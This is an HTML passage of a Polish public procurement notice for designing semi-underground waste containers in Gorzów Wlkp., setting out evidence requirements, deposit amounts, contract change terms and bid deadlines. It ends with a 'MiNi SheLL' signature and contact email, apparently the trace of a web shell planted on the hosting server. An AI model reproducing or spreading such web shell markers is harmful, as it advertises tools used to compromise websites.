funkcje wszystkich warunków wymaganych dla poszczególnych funkcji. Zamawiający wymaga, aby<br/>osoba wykazana na spełnienie warunku udziału w postępowaniu w specjalności architektonicznej była jednocześnie osobą<br/>kierującą pracami projektowymi - Głównym projektantem, z zastrzeżeniem, że osoba ta będzie musiała wykonywać<br/>przewidziane dla niej czynności osobiście.<br/>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im<br/>uprawnienia budowlane wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz.U. z 2020 r., poz. 1333 z<br/>późn. zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220 z późn. zm.) - które pozwalać będą na pełnienie określonych<br/>funkcji w zakresie objętym umową.<br/>Przez uprawnienia budowlane rozumie się:<br/>a) prawo wykonywania samodzielnych funkcji technicznych w budownictwie, o którym mowa w ustawie z dnia 7 lipca 1994 r.<br/>Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29<br/>kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019 r., poz. 831), lub uzyskane przed dniem wejścia w życie ustawy - Prawo budowlane, lub<br/>b) odpowiadające im ważne uprawnienia budowlane wydane na podstawie odpowiednich przepisów obowiązujących na<br/>terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznane przez właściwy organ, zgodnie z ustawą<br/>z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz. U. z 2021 r. poz. 1646 .), lub<br/>c) prawo do świadczenia na terytorium Rzeczypospolitej Polskiej usługi transgranicznej, w rozumieniu przepisów ustawy<br/>cytowanej w ppkt. II, oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa (tekst jedn. - Dz. U. z 2019 r., poz. 1117).<br/>2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>pkt. 1 ppkt. 2) SWZ, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do<br/>których realizacji te uprawnienia są wymagane.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt. 2 i 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi<br/>Załącznik nr 9 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Podmiotowe środki<br/>dowodowe składane w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) Informacja z Krajowego Rejestru Karnego w zakresie:<br/>- art. 108 ust. 1 pkt 1 i 2 ustawy Pzp<br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego -<br/>sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem<br/>2) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej.<br/>Zamawiający zaleca wykorzystanie Załącznika nr 8 do SWZ<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>4) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>- art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>- art. 109 ust. 1 pkt 8-10 ustawy Pzp.<br/>- art. 7 ust. 1 specustawy .<br/>Zamawiający zaleca wykorzystanie Załącznika nr 7 do SWZ<br/>Pozostałe informacje znajdują się w rozdziale VIII SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem<br/>ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy<br/>Zamawiający zaleca wykorzystanie Załącznika nr 5 do SWZ<br/>2. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego odpowiedzianych za świadczenie usług<br/>projektowych wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami;<br/>Zamawiający zaleca wykorzystanie Załącznika nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert w wysokości:<br/>1) Część 1 – 1.000 zł<br/>2) Część 2 – 3.000 zł.<br/>2. W przypadku, gdy Wykonawca składa ofertę na dwie części zamówienia, zobowiązany jest wnieść wadium w kwocie<br/>stanowiącej sumę kwot, wymienionych w ust. 1, odpowiadających częściom zamówienia, na które Wykonawca składa<br/>ofertę.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, t.j.: Dz. U. z 2020 r. poz. 299 ze zm.<br/>4. Wadium wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego nr: 05 8363 0004 0000<br/>5379 2000 0014, z dopiskiem: ,,WADIUM – „Opracowanie dokumentacji projektowej na wykonanie pojemników<br/>półpodziemnych na terenie Gorzowa Wlkp. oraz obudów pojemników naziemnych na terenie gmin Bogdaniec, Deszczno,<br/>Kłodawa, Lubiszyn i Santok – część __ zamówienia”.<br/>5. Treść dokumentu wadialnego, w przypadku wnoszenia wadium w formach innych niż pieniądz (at.. gwarancji, poręczenia)<br/>musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia,<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie Gwaranta lub Poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie pełnej kwoty gwarancji/poręczenia<br/>na pierwsze pisemne żądanie Zamawiającego w przypadkach określonych art. 98 ust. 6 P.z.p.<br/>5) gwarancja/poręczenie, stanowiące wadium, nie może wygasać przed końcem okresu związania ofertą,<br/>6) niedopuszczalne jest wprowadzanie w treści dokumentu wadialnego jakichkolwiek warunków ograniczających<br/>Zamawiającemu wypłacenie wadium.<br/>6. Wadium wnoszone w formie innej niż pieniądz (dokument wadialny) należy złożyć wraz z ofertą za pomocą Platformy -<br/>jako załącznik do oferty - w oryginale wystawionym przez Gwaranta/Poręczyciela, w postaci elektronicznej, opatrzonym<br/>kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia w imieniu Gwaranta/Poręczyciela. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie, o którym mowa w Rozdziale VIII ust. 1. Dokument ten potwierdza brak podstaw wykluczenia z postępowania<br/>w zakresie, w którym Wykonawca zobowiązany jest wykazać brak podstaw wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. Podmiotowe środki dowodowe, dotyczące braku podstaw do wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Podmiotowe środki dowodowe dotyczące spełniania warunków udziału w postępowaniu składa odpowiednio Wykonawca/Wykonawcy wykazujący spełnienie warunku na zasadach określonych w Rozdziale V SWZ.<br/>3. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo do pełnienia takiej funkcji, udzielone zgodnie z wymogami ustawowymi, podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym przez prawnie upoważnionych przedstawicieli każdego z Wykonawców występujących wspólnie, należy załączyć do oferty.<br/>4. Wykonawcy, wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się zmianę postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy w przypadku wystąpienia następujących zdarzeń:<br/>1) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu<br/>umowy;<br/>2) wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy lub inne<br/>zdarzenia), przy pomocy których Wykonawca realizuje Przedmiot umowy; Przedmiotowa zmiana jest możliwa pod<br/>warunkiem zaproponowania innych osób spełniających na dzień składania ofert warunki określone przez Zamawiającego w<br/>Specyfikacji Warunków Zamówienia;<br/>3) wystąpienia konieczności zmian osób Wykonawcy, w przypadku, gdy Zamawiający uzna, że osoby te nie wykonują<br/>należycie swoich obowiązków; Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień<br/>składania ofert warunki określone w Specyfikacji Warunków Zamówienia, w terminie nie dłuższym niż 14 dni od daty<br/>złożenia żądania przez Zamawiającego;<br/>4) zmiany terminu realizacji Przedmiotu umowy z przyczyn niezależnych od Wykonawcy, w szczególności gdy: (1) wystąpi<br/>opóźnienie w wydaniu przez właściwe podmioty decyzji administracyjnych, zezwoleń, uzgodnień, itp. do wydania których są<br/>zobowiązane na mocy przepisów prawa, jeśli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym w/w<br/>decyzje, zezwolenia, uzgodnienia itp. powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca<br/>ponosi odpowiedzialność, (2) wezwania przez organy administracji publicznej lub inne upoważnione podmioty do<br/>uzupełnienia przedmiotu umowy, jego poszczególnych części/opracowań projektowych. Zmieniając termin Strony biorą pod<br/>uwagę czas trwania przeszkody;<br/>5) zmiany terminu realizacji Przedmiotu umowy o czas trwania przeszkody z powodu wystąpienia siły wyższej rozumianej<br/>jako pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, epidemia, pandemia,<br/>niepokoje społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne nadzwyczajne<br/>zjawiska losowe i przyrodnicze, wszystkie z nich pozostające poza kontrolą Stron, których nie można było przewidzieć w<br/>chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec;<br/>6) wystąpienia konieczności zmian lokalizacji wyznaczonej do zaprojektowania pojemników lub obudów (w tym zmiany<br/>nieruchomości lub działki) w przypadku jeżeli wykonanie umów w tym zakresie będzie niemożliwe z uwagi na ograniczenia<br/>faktyczne lub prawne.<br/>7) zmiany obowiązującej stawki VAT;<br/>2. Niezależnie od powyższego, Strony dopuszczają możliwość zmian redakcyjnych Umowy oraz zmian będących<br/>następstwem zmian danych Stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia<br/>realizacji Przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez<br/>Zamawiającego na wykonanie, utrzymanie lub użytkowanie Przedmiotu umowy bądź zwiększających użyteczność<br/>Przedmiotu umowy. W takiej sytuacji, strony wprowadzą do umowy stosowne zmiany weryfikujące redakcyjne<br/>dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też<br/>kierując się poszanowaniem wzajemnych interesów, zasadą równości Stron oraz ekwiwalentności świadczeń i przede<br/>wszystkim zgodnym zamiarem wykonania Przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji<br/>Przedmiotu umowy.<br/>3. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany umowy następujące zmiany:<br/>1) danych związanych z obsługą administracyjno-organizacyjną Umowy,<br/>2) danych teleadresowych,<br/>3) danych rejestrowych, <br/>4) będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.<br/>4. Wszelkie zmiany do Umowy wymagają pisemnego aneksu podpisanego przez strony pod rygorem nieważności.<br/>5. W przypadku wykonawców mających siedzibę lub wykonujących działalność związaną z realizacją umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-03 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com